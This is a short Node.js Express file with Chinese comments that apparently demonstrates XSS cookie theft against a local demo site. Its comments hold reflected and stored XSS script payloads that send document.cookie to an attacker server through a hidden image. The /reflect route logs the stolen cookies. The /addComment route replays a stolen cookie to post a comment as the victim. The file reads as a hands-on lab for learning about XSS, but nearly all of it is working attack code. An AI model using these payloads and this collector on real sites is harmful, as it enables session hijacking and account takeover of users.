const express = require('express');
const app = express();
const path = require('path');
const request = require('request')
const bodyParser = require('body-parser');

//将参数转换成对象
app.use(bodyParser.urlencoded({ extended: true }));

// 反射类型获取到cookie
// `/welcome?type=<script>var img=document.createElement('img');img.src='http://localhost:4000/reflect?data=${document.cookie}';img.style.display='none';<\/script>`
app.get('/reflect', function(req, res) {
  console.log(`攻击者拿到cookie为${req.query.data}`)
  res.json({code: 1, msg: `攻击者拿到cookie为${req.query.data}`})
})
// DOM类型获取到cookie和存储型
// <script>var img=document.createElement('img');img.src=`http://localhost:4000/addComment?data=${document.cookie}`;img.style.display='none';</script>111
app.get('/addComment', function(req, res) {
  let e = request({
    url: 'http://localhost:3000/addComment',
    method: 'post',
    headers: {'Cookie': req.query.data, 'Content-Type': 'application/x-www-form-urlencoded'},
    form: {comment: '啦啦啦，你被攻击了'}
  })
  res.json({code: 1, msg: e})
})

app.listen(4000, function(req, res) {
  console.log('打开http://localhost:4000/addComment开始你的邪恶之路~~~')
})